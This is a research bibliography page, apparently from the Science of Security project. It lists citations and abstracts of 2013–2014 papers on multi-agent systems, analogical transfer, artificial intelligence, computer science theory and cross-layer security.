  • Cain, Ashley A.; Schuster, David, "Measurement of situation awareness among diverse agents in cyber security," Cognitive Methods in Situation Awareness and Decision Support (CogSIMA), 2014 IEEE International Inter-Disciplinary Conference on , vol., no., pp.124,129, 3-6 March 2014. (ID#:14-1609) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6816551&isnumber=6816529 Development of innovative algorithms, metrics, visualizations, and other forms of automation are needed to enable network analysts to build situation awareness (SA) from large amounts of dynamic, distributed, and interacting data in cyber security. Several models of cyber SA can be classified as taking an individual or a distributed approach to modeling SA within a computer network. While these models suggest ways to integrate the SA contributed by multiple actors, implementing more advanced data center automation will require consideration of the differences and similarities between human teaming and human-automation interaction. The purpose of this paper is to offer guidance for quantifying the shared cognition of diverse agents in cyber security. The recommendations presented can inform the development of automated aids to SA as well as illustrate paths for future empirical research. Keywords: Automation; Autonomous agents; Cognition; Computer security; Data models; Sociotechnical systems; Situation awareness; cognition; cyber security; information security; teamwork

  • Leal, E.T.; Chiotti, O.; Villarreal, P.D., "Software Agents for Management Dynamic Inter-Organizational Collaborations," Latin America Transactions, IEEE (Revista IEEE America Latina) , vol.12, no.2, pp.330,341, March 2014. (ID#:14-16010) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6749556&isnumber=6749519 The globalization, modern markets, as well as new organizational management philosophies and advances in Information and Communications Technologies, encourage organizations to establish collaboration networks or inter-organizational collaborations. In this paper we propose a technology solution based on software agents which allows supporting the management of collaborative business processes in environments dynamic inter-organizational collaborations. First, we propose a software agent platform that integrates in agent specification's the notions of Belief-Desire-Intention agent architecture with functionalities of process-aware information systems. The platform enables organizations to negotiate collaborations agreements in electronic format to establish dynamic inter-organizational collaborations and define the collaborative processes to be executed. Second, we propose a methodology that includes methods based on Model-Driven Development, which enable the generation of executable process models and the code of process-oriented agents, derived from conceptual models of collaborative processes. This methodology and methods are implemented and automated by software agents that enable the generations of these implementation artifacts, at run-time of the platform. Therefore, the platform enables the automatic generation of the technology solution that requires each organization to execute the agreed collaborative processes, where the generated artifacts are built and initialized in the platform, allowing the implementation and execution of these processes. In this way, the proposed agent-based platform allows to establish collaboration among heterogeneous and autonomous organizations focusing in the process-oriented integration. Keywords: business data processing; globalization; groupware; organizational aspects; software agents; software architecture; agent specification; agent-based platform; automatic generation; autonomous organization; belief-desire-intention agent architecture; collaboration networks; collaborations agreements; collaborative business processes; collaborative processes; dynamic interorganizational collaborations; electronic format; executable process models; globalization; heterogeneous organizations; information and communications technology; management dynamic interorganizational collaboration; model-driven development; organizational management philosophy; process-aware information systems; process-oriented agents; process-oriented integration; software agent platform; software agents; Adaptation models; Collaboration; Organizations; Software agents; Unified modeling language; Collaborative Business Process; Dynamic Inter-Organizational Collaborations; Model-Driven Development; Software Agents

  • Xu, J.; Song, Y.; van der Schaar, M., "Sharing in Networks of Strategic Agents," Selected Topics in Signal Processing, IEEE Journal of, vol.PP, no.99, pp.1,1, April 2014. (ID#:14-1611) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6787069&isnumber=5418892 In social, economic and engineering networks, connected agents need to cooperate by repeatedly sharing information and/or goods. Typically, sharing is costly and there are no immediate benefits for agents who share. Hence, agents who strategically aim to maximize their own individual utilities will "free-ride" because they lack incentives to cooperate/share, thereby leading to inefficient operation or even collapse of networks. To incentivize the strategic agents to cooperate with each other, we design distributed rating protocols which exploit the ongoing nature of the agents' interactions to assign ratings and through them, determine future rewards and punishments: agents that have behaved as directed enjoy high ratings - and hence greater future access to the information/goods of others; agents that have not behaved as directed enjoy low ratings - and hence less future access to the information/goods of others. Unlike existing rating protocols, the proposed protocol operates in a distributed manner and takes into consideration the underlying interconnectivity of agents as well as their heterogeneity. We prove that in many networks, the price of anarchy (PoA) obtained by adopting the proposed rating protocols is 1, that is, the optimal social welfare is attained. In networks where PoA is larger than 1, we show that the proposed rating protocol significantly outperforms existing incentive mechanisms. Last but not least, the proposed rating protocols can also operate efficiently in dynamic networks, where new agents enter the network over time. Keywords: (not provided)

  • Khac Duc Do, "Bounded Assignment Formation Control of Second-Order Dynamic Agents," Mechatronics, IEEE/ASME Transactions on , vol.19, no.2, pp.477,489, April 2014. (ID#:14-1612) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6464623&isnumber=6746080 A constructive design of bounded formation controllers is proposed to force N mobile agents with second-order dynamics to track N reference trajectories and to avoid collision between them. Instead of a prior assignation of the reference trajectories to the agents, optimal assignment algorithms are used to assign desired reference trajectories to the agents to obtain optimal criteria such as linear summation and bottleneck functions of the initial traveling distances of the agents. After the reference trajectories are optimally assigned, the bounded formation control design is based on a new bounded control design technique for second-order systems and new pairwise collision avoidance functions. The pairwise collision functions are functions of both relative positions and relative velocities of the agents instead of only relative positions as in the literature. The proposed results are illustrated on a group of underactuated omnidirectional intelligent navigators in a vertical plane. Keywords: collision avoidance; control system synthesis; mobile robots; robot dynamics; N-reference trajectory tracking; bottleneck functions; bounded assignment formation control constructive design ;initial traveling distances; linear summation; mobile agents; optimal assignment algorithms; optimal criteria; pairwise collision functions; second-order dynamic agent system; underactuated omnidirectional intelligent navigators; vertical plane; Algorithm design and analysis; Collision avoidance; Control design; Shape; Stability analysis; Trajectory; Vectors; Assignment; bounded formation control; collision avoidance; potential functions; second-order agents

  • Clark, A.; Alomair, B.; Bushnell, L.; Poovendran, R., "Minimizing Convergence Error in Multi-Agent Systems Via Leader Selection: A Supermodular Optimization Approach," Automatic Control, IEEE Transactions on , vol.59, no.6, pp.1480,1494, June 2014. (ID#:14-1613) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6727405&isnumber=6819104 In a leader-follower multi-agent system (MAS), the leader agents act as control inputs and influence the states of the remaining follower agents. The rate at which the follower agents converge to their desired states, as well as the errors in the follower agent states prior to convergence, are determined by the choice of leader agents. In this paper, we study leader selection in order to minimize convergence errors experienced by the follower agents, which we define as a norm of the distance between the follower agents' intermediate states and the convex hull of the leader agent states. By introducing a novel connection to random walks on the network graph, we show that the convergence error has an inherent supermodular structure as a function of the leader set. Supermodularity enables development of efficient discrete optimization algorithms that directly approximate the optimal leader set, provide provable performance guarantees, and do not rely on continuous relaxations. We formulate two leader selection problems within the supermodular optimization framework, namely, the problem of selecting a fixed number of leader agents in order to minimize the convergence error, as well as the problem of selecting the minimum-size set of leader agents to achieve a given bound on the convergence error. We introduce algorithms for approximating the optimal solution to both problems in static networks, dynamic networks with known topology distributions, and dynamic networks with unknown and unpredictable topology distributions. Our approach is shown to provide significantly lower convergence errors than existing random and degree-based leader selection methods in a numerical study. Keywords: Approximation algorithms; Convergence; Heuristic algorithms; Network topology; Optimization; Topology; Upper bound; Multi-agent system (MAS)

  • Dayong Ye; Minjie Zhang; Sutanto, D., "Cloning, Resource Exchange, and Relation Adaptation: An Integrative Self-Organization Mechanism in a Distributed Agent Network," Parallel and Distributed Systems, IEEE Transactions on , vol.25, no.4, pp.887,897, April 2014. (ID#:14-1614) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6506072&isnumber=6750096 Self-organization provides a suitable paradigm for developing self-managed complex distributed systems, such as grid computing and sensor networks. In this paper, an integrative self-organization mechanism is proposed. Unlike current related studies, which propose only a single principle of self-organization, this mechanism synthesizes the three principles of self-organization: cloning/spawning, resource exchange and relation adaptation. Based on this mechanism, an agent can autonomously generate new agents when it is overloaded, exchange resources with other agents if necessary, and modify relations with other agents to achieve a better agent network structure. In this way, agents can adapt to dynamic environments. The proposed mechanism is evaluated through a comparison with three other approaches, each of which represents state-of-the-art research in each of the three self-organisation principles. Experimental results demonstrate that the proposed mechanism outperforms the three approaches in terms of the profit of individual agents and the entire agent network, the load-balancing among agents, and the time consumption to finish a simulation run. Keywords: distributed processing; multi-agent systems; resource allocation; agent network structure; autonomous agent generation; cloning principle; distributed agent network; grid computing; integrative self-organization mechanism; load-balancing; relation adaptation principle; resource exchange principle; self-managed complex distributed systems; self-organization principle; sensor networks; simulation run; spawning principle; Cloning; Equations; Layout; Mathematical model; Multi-agent systems; Nickel; Resource management; Distributed multi-agent system; reinforcement learning; self-organization

  • Isidori, A.; Marconi, L.; Casadei, G., "Robust Output Synchronization of a Network of Heterogeneous Nonlinear Agents via Nonlinear Regulation Theory," Automatic Control, IEEE Transactions on, vol. PP, no.99, pp.1,1, May 2014. (ID#:14-1615) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6819823&isnumber=4601496 In this paper, we consider the output synchronization problem for a network of heterogeneous diffusively-coupled nonlinear agents. Specifically, we show how the (heterogeneous) agents can be controlled in such a way that their outputs asymptotically track the output of a prescribed nonlinear exosystem. The problem is solved in two steps. In the first step, the problem of achieving consensus among (identical) nonlinear reference generators is addressed. In this respect, it is shown how the techniques recently developed to solve the consensus problem among linear agents can be extended to agents modeled by nonlinear d-dimensional differential equations, under the assumption that the communication graph is connected. In the second step, the theory of nonlinear output regulation is applied in a decentralized control mode, to force the output of each agent of the network to robustly track the (synchronized) output of a local reference model. Simulation results are presented to show the effectiveness of the design methodology. Keywords: Eigenvalues and eigenfunctions; Generators; Mathematical model; Nonlinear systems; Regulators; Synchronization; Trajectory

  • Turguner, Cansin, "Secure fault tolerance mechanism of wireless Ad-Hoc networks with mobile agents," Signal Processing and Communications Applications Conference (SIU), 2014 22nd , vol., no., pp.1620,1623, 23-25 April 2014. (ID#:14-1616) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830555&isnumber=6830164 Mobile Ad-Hoc Networks are dynamic and wireless self-organization networks that many mobile nodes connect to each other weakly. To compare with traditional networks, they suffer failures that prevent the system from working properly. Nevertheless, we have to cope with many security issues such as unauthorized attempts, security threats and reliability. Using mobile agents in having low level fault tolerance ad-hoc networks provides fault masking that the users never notice. Mobile agent migration among nodes, choosing an alternative paths autonomous and, having high level fault tolerance provide networks that have low bandwidth and high failure ratio, more reliable. In this paper we declare that mobile agents fault tolerance peculiarity and existing fault tolerance method based on mobile agents. Also in ad-hoc networks that need security precautions behind fault tolerance, we express the new model: Secure Mobil Agent Based Fault Tolerance Model. Keywords: Ad hoc networks; Conferences; Erbium; Fault tolerance; Fault tolerant systems; Mobile agents; Signal processing; Ad-Hoc network; fault tolerance; mobile agent; related works; secure communication


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Analogical Transfer


Analogical transfer is a psychology theory concerned with overcoming fixed ways of viewing particular problems or objects. In security, this problem is manifested by system developers and administrators overlooking critical security requirements due to lack of tools and techniques that allow them to tailor security knowledge to their particular context. The three works cited here use analogy and simulations to achieve break-through thinking. The first paper was presented at HOT SoS 2014, the Symposium and Bootcamp on the Science of Security (HotSoS), a research event centered on the Science of Security held April 8-9, 2014 in Raleigh, North Carolina

  • Ashwini Rao, Hanan Hibshi, Travis Breaux, Jean-Michel Lehker, Jianwei Niu. "Less is More? Investigating the Role of Examples in Security Studies using Analogical Transfer" HOT SoS 2014. (ID#:14-1359) Available at: http://www.hot-sos.org/2014/proceedings/papers.pdf To explore the impact of new security methods, experts must improve our ability to study the impact of security tools and methods on software and system development. This paper presents initial results of an experiment to assess the extent to which the number and type of examples used in security training stimuli can impact security problem solving. Keywords: Security; Human Factors; Psychology; Analogical Transfer
  • Robert Ganian; Petr Hlineny , Jan Obdrzalek "Better Algorithms for Satisfiability Problems for Formulas of Bounded Rank-width" Fundamenta Informaticae - MFCS & CSL 2010 Satellite Workshops: Selected Papers archive Volume 123 Issue 1, January 2013. (Pages 59-76) IOS Press Amsterdam, The Netherlands, The Netherlands. (ID#:14-1360) Available at: http://dl.acm.org/citation.cfm?id=2594865.2594870&coll=DL&dl=GUIDE&CFID=445385349&CFTOKEN=72920989 or http://dx.doi.org/10.3233/FI-2013-800 We provide a parameterized algorithm for the propositional model counting problem #SAT, the runtime of which has a single-exponential dependency on the rank-width of the signed graph of a formula. That is, our algorithm runs in time $\cal{O}t^3 \cdot 2^{3tt+1/2} \cdot \vert\phi\vert$ for a width-t rank-decomposition of the input f, and can be of practical interest for small values of rank-width. Previously, analogical algorithms have been known --e.g. [Fischer, Makowsky, and Ravve] --with a single-exponential dependency on the clique-width k of the signed graph of a formula with a given k-expression. Our algorithm presents an exponential runtime improvement over the worst-case scenario of the previous one, since clique-width reaches up to exponentially higher values than rank width. We also provide an algorithm for the MAX-SAT problem along the same lines.
  • August Betzler, Carles Gomez, Ilker Demirkol Josep Paradells. "Congestion control in reliable CoAP communication" MSWiM '13 Proceedings of the 16th ACM international conference on Modeling, analysis & simulation of wireless and mobile systems. November 2013. (Pages 365-372). (ID#:14-1361) Available at: http://doi.acm.org/10.1145/2507924.2507954 The development of IPv6 stacks for wireless constrained devices that have limited hardware resources has paved the way for many new areas of applications and protocols. The Constrained Application Protocol (CoAP) has been designed by the IETF to enable the manipulation of resources for constrained devices that are capable of connecting to the Internet. Due to the limited radio channel capacities and hardware resources, congestion is a common phenomenon in networks of constrained devices. CoAP implements a basic congestion control mechanism for the transmission of reliable messages. Alternative CoAP congestion control approaches are a recent topic of interest in the IETF CoRE Working Group. New Internet-Drafts discuss the limitations of the default congestion control mechanisms and propose alternative ones, yet, there have been no studies in the literature that compare the original approach to the alternative ones. In this paper, we target this crucial study and perform evaluations that show how the default and alternative congestion control mechanisms compare to each other. We use the Cooja simulation environment, which is part of the Contiki development toolset, to simulate CoAP within a complete protocol stack that uses IETF protocols for constrained networks. Through simulations of different network topologies and varying traffic loads, we demonstrate how the advanced mechanisms proposed in the drafts perform relative to the basic congestion control mechanism. Keywords: Applications (SMTP, FTP, etc.) Protocol architecture (OSI model)

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Artificial Intelligence

Artificial Intelligence


John McCarthy, coined the term "Artificial Intelligence" in 1955. He defines it as "the science and engineering of making intelligent machines." (as quoted in Poole, Mackworth & Goebel, 1998) AI research is highly technical and specialized, and has been characterized as "deeply divided into subfields that often fail to communicate with each other." (McCorduck, Pamela (2004), Machines Who Think (2nd ed.) These divisions are attributed to both technical and social factors. The research cited here looks at the divisions and viewpoints and includes an overview of the current science of artificial intelligence, also known as intelligent computing.

  • Usha Gayatri, P.; Neeraja S.; Leela Poornima, Ch.; Chandra Sekharaiah, K.; Yuvaraj, M., "Exploring Cyber Intelligence Alternatives For Countering Cyber Crime," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on , vol., no., pp.900,902, 5-7 March 2014. (ID#:14-1621) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828093&isnumber=6827395 In this paper, a case study of cyber crime is presented in the context of JNTUHJAC website. CERT-In is identified as the organization relevant to handling this kind of cybercrime. This paper is an attempt to find and do away with the lacunae in the prevailing cyber laws and the I.T. Act 2000 and the related amendment act 2008 such that law takes cognizance of all kinds of cybercrimes perpetrated against individuals/societies/nations. It is found that ICANN is an organization to control the cyberspace by blocking the space wherein the content involves cognizable offence. Keywords: Artificial intelligence; Computer crime; Context; Cyberspace; Handheld computers; Internet; Organizations; Artificial Intelligence (AI);Collective Intelligence (CI);Information Technology (IT); Information and Communication Technologies (ICTs); Web Intelligence (WI)
  • Mijumbi, Rashid; Gorricho, Juan-Luis; Serrat, Joan; Claeys, Maxim; De Turck, Filip; Latre, Steven, "Design and evaluation of learning algorithms for dynamic resource management in virtual networks," Network Operations and Management Symposium (NOMS), 2014 IEEE , vol., no., pp.1,9, 5-9 May 2014. (ID#:14-1622) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6838258&isnumber=6838210 Network virtualization is considerably gaining attention as a solution to ossification of the Internet. However, the success of network virtualization will depend in part on how efficiently the virtual networks utilize substrate network resources. In this paper, we propose a machine learning-based approach to virtual network resource management. We propose to model the substrate network as a decentralized system and introduce a learning algorithm in each substrate node and substrate link, providing self-organization capabilities. We propose a multiagent learning algorithm that carries out the substrate network resource management in a coordinated and decentralized way. The task of these agents is to use evaluative feedback to learn an optimal policy so as to dynamically allocate network resources to virtual nodes and links. The agents ensure that while the virtual networks have the resources they need at any given time, only the required resources are reserved for this purpose. Simulations show that our dynamic approach significantly improves the virtual network acceptance ratio and the maximum number of accepted virtual network requests at any time while ensuring that virtual network quality of service requirements such as packet drop rate and virtual link delay are not affected. Keywords: Bandwidth; Delays; Dynamic scheduling; Heuristic algorithms; Learning (artificial intelligence);Resource management; Substrates; Artificial Intelligence; Dynamic Resource Allocation; Machine Learning; Multiagent Systems; Network virtualization; Reinforcement Learning; Virtual Network Embedding
  • Lamperti, G.; Zhao, X., "Diagnosis of Active Systems by Semantic Patterns," Systems, Man, and Cybernetics: Systems, IEEE Transactions on , vol.PP, no.99, pp.1,1, January 2014. (ID#:14-1623) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6725692&isnumber=6376248 A gap still exists between complex discrete-event systems (DESs) and the effectiveness of the state-of-the-art diagnosis techniques, where faults are defined at component levels and diagnoses incorporate the occurrences of component faults. All these approaches to diagnosis are context-free, in as much diagnosis is anchored to components, irrespective of the context in which they are embedded. By contrast, since complex DESs are naturally organized in hierarchies of contexts, different diagnosis rules are to be defined for different contexts. Diagnosis rules are specified based on associations between context-sensitive faults and regular expressions, called semantic patterns. Since the alphabets of such regular expressions are stratified, so that the semantic patterns of a context are defined based on the interface symbols of its subcontexts only, separation of concerns is achieved, and the expressive power of diagnosis is enhanced. This new approach to diagnosis is bound to seemingly contradictory but nonetheless possible scenarios: a DES can be normal despite the faulty behavior of a number of its components; also, it can be faulty despite the normal behavior of all its components. Keywords: Automata; Circuit faults; Context; History; Monitoring; Semantics; Syntactics; Artificial intelligence; decision support systems; discrete-event systems (DESs);fault diagnosis ;intelligent systems
  • Wolff, J.G., "Big Data and the SP Theory of Intelligence," Access, IEEE , vol.2, no., pp.301,315, 2014. (ID#:14-1624) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6782396&isnumber=6705689 This paper is about how the SP theory of intelligence and its realization in the SP machine may, with advantage, be applied to the management and analysis of big data. The SP system-introduced in this paper and fully described elsewhere-may help to overcome the problem of variety in big data; it has potential as a universal framework for the representation and processing of diverse kinds of knowledge, helping to reduce the diversity of formalisms and formats for knowledge, and the different ways in which they are processed. It has strengths in the unsupervised learning or discovery of structure in data, in pattern recognition, in the parsing and production of natural language, in several kinds of reasoning, and more. It lends itself to the analysis of streaming data, helping to overcome the problem of velocity in big data. Central in the workings of the system is lossless compression of information: making big data smaller and reducing problems of storage and management. There is potential for substantial economies in the transmission of data, for big cuts in the use of energy in computing, for faster processing, and for smaller and lighter computers. The system provides a handle on the problem of veracity in big data, with potential to assist in the management of errors and uncertainties in data. It lends itself to the visualization of knowledge structures and inferential processes. A high-parallel, open-source version of the SP machine would provide a means for researchers everywhere to explore what can be done with the system and to create new versions of it. Keywords: Big Data; data analysis; data compression; data mining; data structures; natural language processing; unsupervised learning; Bid Data analysis; Big Data management; SP machine; SP theory of intelligence; data structure discovery; error management; high-parallel open-source version; inferential processes; knowledge structure visualization; lossless compression; natural language production; pattern recognition; streaming data analysis; unsupervised learning; Cognition; Computers; Data handling; Data storage systems; Information management; Licenses; Natural languages; Artificial intelligence; big data; cognitive science; computational efficiency; data compression; data-centric computing; energy efficiency; pattern recognition; uncertainty; unsupervised learning
  • Zhu, B.B.; Yan, J.; Guanbo Bao; Maowei Yang; Ning Xu, "Captcha as Graphical Passwords--A New Security Primitive Based on Hard AI Problems," Information Forensics and Security, IEEE Transactions on, vol.9, no.6, pp.891,904, June 2014. (ID#:14-1625) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6775249&isnumber=6803967 Many security primitives are based on hard mathematical problems. Using hard AI problems for security is emerging as an exciting new paradigm, but has been under-explored. In this paper, we present a new security primitive based on hard AI problems, namely, a novel family of graphical password systems built on top of Captcha technology, which we call Captcha as graphical passwords (CaRP). CaRP is both a Captcha and a graphical password scheme. CaRP addresses a number of security problems altogether, such as online guessing attacks, relay attacks, and, if combined with dual-view technologies, shoulder-surfing attacks. Notably, a CaRP password can be found only probabilistically by automatic online guessing attacks even if the password is in the search set. CaRP also offers a novel approach to address the well-known image hotspot problem in popular graphical password systems, such as PassPoints, that often leads to weak password choices. CaRP is not a panacea, but it offers reasonable security and usability and appears to fit well with some practical applications for improving online security. Keywords: artificial intelligence; security of data; CaRP password; Captcha as graphical passwords; PassPoints; artificial intelligence; automatic online guessing attacks; dual-view technologies; hard AI problems; hard mathematical problems; image hotspot problem; online security; password choices; relay attacks; search set; security primitives; shoulder-surfing attacks; Animals; Artificial intelligence; Authentication; CAPTCHAs; Usability; Visualization; CaRP; Captcha; Graphical password; dictionary attack; hotspots; password; password guessing attack; security primitive
  • Chaudhary, A.; Kumar, A.; Tiwari, V.N., "A reliable solution against Packet dropping attack due to malicious nodes using fuzzy Logic in MANETs," Optimization, Reliabilty, and Information Technology (ICROIT), 2014 International Conference on , vol., no., pp.178,181, 6-8 Feb. 2014. (ID#:14-1626) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798326&isnumber=6798279 The recent trend of mobile ad hoc network increases the ability and impregnability of communication between the mobile nodes. Mobile ad Hoc networks are completely free from pre-existing infrastructure or authentication point so that all the present mobile nodes which are want to communicate with each other immediately form the topology and initiates the request for data packets to send or receive. For the security perspective, communication between mobile nodes via wireless links make these networks more susceptible to internal or external attacks because any one can join and move the network at any time. In general, Packet dropping attack through the malicious node (s) is one of the possible attacks in the mobile ad hoc network. This paper emphasized to develop an intrusion detection system using fuzzy Logic to detect the packet dropping attack from the mobile ad hoc networks and also remove the malicious nodes in order to save the resources of mobile nodes. For the implementation point of view Qualnet simulator 6.1 and Mamdani fuzzy inference system are used to analyze the results. Simulation results show that our system is more capable to detect the dropping attacks with high positive rate and low false positive. Keywords: fuzzy logic; inference mechanisms; mobile ad hoc networks; mobile computing; security of data; MANET; Mamdani fuzzy inference system; Qualnet simulator 6.1;data packets; fuzzy logic; intrusion detection system; malicious nodes; mobile ad hoc network; mobile nodes; packet dropping attack; wireless links; Ad hoc networks; Artificial intelligence; Fuzzy sets; Mobile computing; Reliability engineering; Routing; Fuzzy Logic; Intrusion Detection System (IDS);MANETs Security Issues; Mobile Ad Hoc networks (MANETs); Packet Dropping attack

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Computer Science as a Theoretical Science

Computer Science as a Theoretical Science


One purpose of the Science of Security project is to look at the scholarly work that has been done over the past decades and determine how that work has contributed to our understanding of the underlying principles. The works cited here address the distinction between computing as a physical science and computing as an abstract science.

  • Peter Freeman, "Science, Computational Science, And Computer Science?," Journal of Computing Sciences in Colleges, Volume 29 Issue 3, January 2014, (Pages 5-6). (ID#:14-1550) Available at: http://dl.acm.org/citation.cfm?id=2544322.2544323&coll=DL&dl=GUIDE&CFID=476964903&CFTOKEN=21008126 This paper takes a look at the impact of computer science on furthering the ability to conduct science itself. In addition to examining the distinctions between science, computational science, and computer science, this paper recognizes the achievements in research and computation tools fostered by computer science. The authors in this paper discuss theory formation, beyond just the contribution of tools, with a view to determine the essence of computer science. Keywords: (not available)
  • Subrata Dasgupta, It Began with Babbage: The Genesis of Computer Science, Oxford University Press, Inc. New York, NY, USA (c)2014 ISBN: 0199309418 9780199309412. (ID#:14-1551) Available at: http://dl.acm.org/citation.cfm?id=2582031&coll=DL&dl=GUIDE&CFID=476964903&CFTOKEN=21008126 This paper, through a historical look at the advent of computer science since Charles Babbage in 1819, discusses the unique position of computer science within the classification of science, remarking that the subject confers with both the physical and the abstract. The author argues that computer science does not adhere to the natural laws guiding fields like physics or chemistry, but rather concerns its existence solely with the notion of purpose. This author draws from Babbageis Difference Engine, as well as early purveyors of what is now called computer science, including Ada Lovelace, Turing, and von Neumann.
  • Heilig, L.; VoB, S., "A Scientometric Analysis of Cloud Computing Literature," Cloud Computing, IEEE Transactions on, vol. PP, no.99, pp.1,1, April 2014. (ID#:14-1552) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6808484&isnumber=6562694 The popularity and rapid development of cloud computing in recent years has led to a huge amount of publications containing the achieved knowledge of this area of research. Due to the interdisciplinary nature and high relevance of cloud computing research, it becomes increasingly difficult or even impossible to understand the overall structure and development of this field without analytical approaches. While evaluating science has a long tradition in many fields, we identify a lack of a comprehensive scientometric study in the area of cloud computing. Based on a large bibliographic data base, this study applies scientometric means to empirically study the evolution and state of cloud computing research with a view from above the clouds. By this, we provide extensive insights into publication patterns, research impact and research productivity. Furthermore, we explore the interplay of related subtopics by analyzing keyword clusters. The results of this study provide a better understanding of patterns, trends and other important factors as a basis for directing research activities, sharing knowledge and collaborating in the area of cloud computing research.


Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.



Cross Layer Security

Cross Layer Security


Protocol architectures traditionally followed strict layering principles to ensure interoperability, rapid deployment, and efficient implementation. But a lack of coordination between layers limits the performance of these architectures. More important, the lack of coordination may introduce security vulnerabilities and potential threat vectors. The literature cited here addresses the problems and opportunities available for cross layer security.

  • Datta, E.; Goyal, N., "Security Attack Mitigation Framework For The Cloud," Reliability and Maintainability Symposium (RAMS), 2014 Annual , vol., no., pp.1,6, 27-30 Jan. 2014. (ID#:14-1627) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798457&isnumber=6798433 Cloud computing brings in a lot of advantages for enterprise IT infrastructure; virtualization technology, which is the backbone of cloud, provides easy consolidation of resources, reduction of cost, space and management efforts. However, security of critical and private data is a major concern which still keeps back a lot of customers from switching over from their traditional in-house IT infrastructure to a cloud service. Existence of techniques to physically locate a virtual machine in the cloud, proliferation of software vulnerability exploits and cross-channel attacks in-between virtual machines, all of these together increases the risk of business data leaks and privacy losses. This work proposes a framework to mitigate such risks and engineer customer trust towards enterprise cloud computing. Everyday new vulnerabilities are being discovered even in well-engineered software products and the hacking techniques are getting sophisticated over time. In this scenario, absolute guarantee of security in enterprise wide information processing system seems a remote possibility; software systems in the cloud are vulnerable to security attacks. Practical solution for the security problems lies in well-engineered attack mitigation plan. At the positive side, cloud computing has a collective infrastructure which can be effectively used to mitigate the attacks if an appropriate defense framework is in place. We propose such an attack mitigation framework for the cloud. Software vulnerabilities in the cloud have different severities and different impacts on the security parameters (confidentiality, integrity, and availability). By using Markov model, we continuously monitor and quantify the risk of compromise in different security parameters (e.g.: change in the potential to compromise the data confidentiality). Whenever, there is a significant change in risk, our framework would facilitate the tenants to calculate the Mean Time to Security Failure (MTTSF) cloud and allow - hem to adopt a dynamic mitigation plan. This framework is an add-on security layer in the cloud resource manager and it could improve the customer trust on enterprise cloud solutions. Keywords: Markov processes; cloud computing; security of data; virtualization; MTTSF cloud; Markov model; attack mitigation plan; availability parameter; business data leaks; cloud resource manager; cloud service; confidentiality parameter; cross-channel attacks; customer trust; enterprise IT infrastructure; enterprise cloud computing; enterprise cloud solutions; enterprise wide information processing system; hacking techniques; information technology; integrity parameter; mean time to security failure; privacy losses; private data security; resource consolidation; security attack mitigation framework; security guarantee; software products; software vulnerabilities; software vulnerability exploits; virtual machine; virtualization technology; Cloud computing; Companies; Security; Silicon; Virtual machining; Attack Graphs; Cloud computing; Markov Chain; Security; Security Administration}
  • Bo Fu; Yang Xiao; Hongmei Deng; Hui Zeng, "A Survey of Cross-Layer Designs in Wireless Networks," Communications Surveys & Tutorials, IEEE , vol.16, no.1, pp.110,126, First Quarter 2014. (ID#:14-1628) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6587995&isnumber=6734841 The strict boundary of the five layers in the TCP/IP network model provides the information encapsulation that enables the standardizing of network communications and makes the implementation of networks convenient in terms of abstract layers. However, the encapsulation results in some side effects, including compromise of QoS, latency, extra overload, etc. Therefore, to mitigate the side effect of the encapsulation between the abstract layers in the TCP/IP model, a number of cross-layer designs have been proposed. Cross-layer designs allow information sharing among all of the five layers in order to improve the wireless network functionality, including security, QoS, and mobility. In this article, we classify cross-layer designs by two ways. On the one hand, by how to share information among the five layers, cross-layer designs can be classified into two categories: non-manager method and manager method. On the other hand, by the organization of the network, cross-layer designs can be classified into two categories: centralized method and distributed method. Furthermore, we summarize the challenges of the cross-layer designs, including coexistence, signaling, the lack of a universal cross-layer design, and the destruction of the layered architecture. Keywords: quality of service; radio networks; telecommunication security; transport protocols; QoS; TCP/IP network model; centralized method; cross-layer designs; distributed method; information encapsulation; manager method; mobility; network communications; security; wireless network functionality; IP networks; Information management; Physical layer; Protocols; Quality of service; Security; Wireless networks; Cross-layer design; security; wireless networks
